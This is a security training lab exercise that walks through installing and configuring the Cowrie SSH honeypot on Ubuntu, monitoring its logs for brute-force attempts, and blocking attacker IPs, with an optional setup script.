Exercise 27: Creating a Honeypot to Detect Attacks

Objective

Deploy a simple honeypot to detect and log malicious activities, analyze attacker behavior, and identify potential threat actors.

Scenario

As a security analyst, you’re tasked with monitoring unauthorized access attempts to your network. Deploying a honeypot can help detect brute-force attacks and malicious activities. In this exercise, you’ll set up a lightweight SSH honeypot using Cowrie, monitor logs for suspicious behavior, and analyze the captured data to identify attackers.

⚠️ Important: Perform this exercise in a controlled lab environment. Do not expose honeypots on production networks without proper security measures.

Lab Instructions

Step 1: Set Up the Environment

• Use a virtual machine (VM) or a dedicated server for the honeypot.
• Install a Linux distribution (e.g., Ubuntu Server).

Step 2: Install Cowrie Honeypot

Update the system:

sudo apt update && sudo apt upgrade -y

Install dependencies:

sudo apt install git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev -y

Clone the Cowrie repository:

git clone https://github.com/cowrie/cowrie.git cd cowrie

Create a Python virtual environment:

python3 -m venv cowrie-env source cowrie-env/bin/activate

Install required Python packages:

pip install -r requirements.txt

Step 3: Configure Cowrie

Copy the default configuration:

cp etc/cowrie.cfg.dist etc/cowrie.cfg

Edit the configuration file to simulate an SSH server:

nano etc/cowrie.cfg

Set the listening port to 22 to mimic a real SSH server:

listen_endpoints = ssh:tcp:22

Allow non-root binding to port 22 using authbind:

sudo apt install authbind -y 
sudo touch /etc/authbind/byport/22 
sudo chmod 500 /etc/authbind/byport/22 
sudo chown cowrie:cowrie /etc/authbind/byport/22

Step 4: Start the Honeypot

Start Cowrie:

bin/cowrie start

Verify that the honeypot is running:

bin/cowrie status

Step 5: Monitor Honeypot Logs

Cowrie logs SSH login attempts and commands:

tail -f var/log/cowrie/cowrie.log

Analyze the failed login attempts, usernames, and passwords used.

View commands executed by attackers:

cat var/log/cowrie/tty/*.log

Step 6: Analyze Collected Data

Identify source IP addresses of attackers:

grep "login attempt" var/log/cowrie/cowrie.log | awk '{print $NF}' | sort | uniq -c | sort -nr

Extract attempted usernames and passwords:

grep "login attempt" var/log/cowrie/cowrie.log | awk -F "user='|', password='" '{print $2, $3}'

Step 7: Mitigation and Further Analysis

Use the data to block malicious IPs at the firewall:

sudo iptables -A INPUT -s <malicious-ip> -j DROP

Report malicious IPs to security intelligence feeds.

Solution & Explanation

How Honeypots Work

• Honeypots simulate vulnerable services to lure attackers.
• They record unauthorized access attempts and actions taken by attackers.

Why Honeypots Are Valuable

• Early Detection: Detect brute-force attacks and exploitation attempts.
• Behavior Analysis: Understand attacker tactics and tools.
• Threat Intelligence: Identify malicious IPs and common attack vectors.

Example Log Entry

2024-01-19 12:45:32+0000 [SSHService ssh-userauth on HoneyPotTransport,1,192.168.1.200] login attempt [user: root, password: 123456] failed

Mitigation Strategies

1. Deploy Honeypots Strategically: Place in DMZ or isolated networks.
2. Monitor Regularly: Analyze logs for attack patterns.
3. Block Malicious IPs: Use firewall rules or intrusion prevention systems.
4. Share Threat Intelligence: Report attacker behavior to relevant databases.

Testing & Verification

• Attempt to SSH into the honeypot from another machine: ssh root@<honeypot-ip>
• Verify that login attempts are logged in cowrie.log.

Security Best Practices

1. Isolate Honeypots: Prevent attackers from pivoting into production systems.
2. Limit Data Exposure: Avoid deploying honeypots that store sensitive data.
3. Use Threat Intelligence: Compare captured data with known attack indicators.
4. Regular Updates: Keep honeypot tools updated to avoid detection.

Additional Script (Optional)

Automate Cowrie installation and setup:

#!/bin/bash
# Automate Cowrie Honeypot Deployment
sudo apt update && sudo apt install git python3 python3-venv python3-pip authbind -y
cd /opt
sudo git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install -r requirements.txt
cp etc/cowrie.cfg.dist etc/cowrie.cfg
sudo touch /etc/authbind/byport/22
sudo chmod 500 /etc/authbind/byport/22
sudo chown $USER /etc/authbind/byport/22
bin/cowrie start

Run the script:

chmod +x deploy_cowrie.sh
sudo ./deploy_cowrie.sh

Conclusion

In this exercise, you deployed and configured Cowrie as an SSH honeypot, monitored logs for brute-force attacks, and analyzed malicious activity. Honeypots provide valuable insights into attacker behavior and are essential for proactive network security.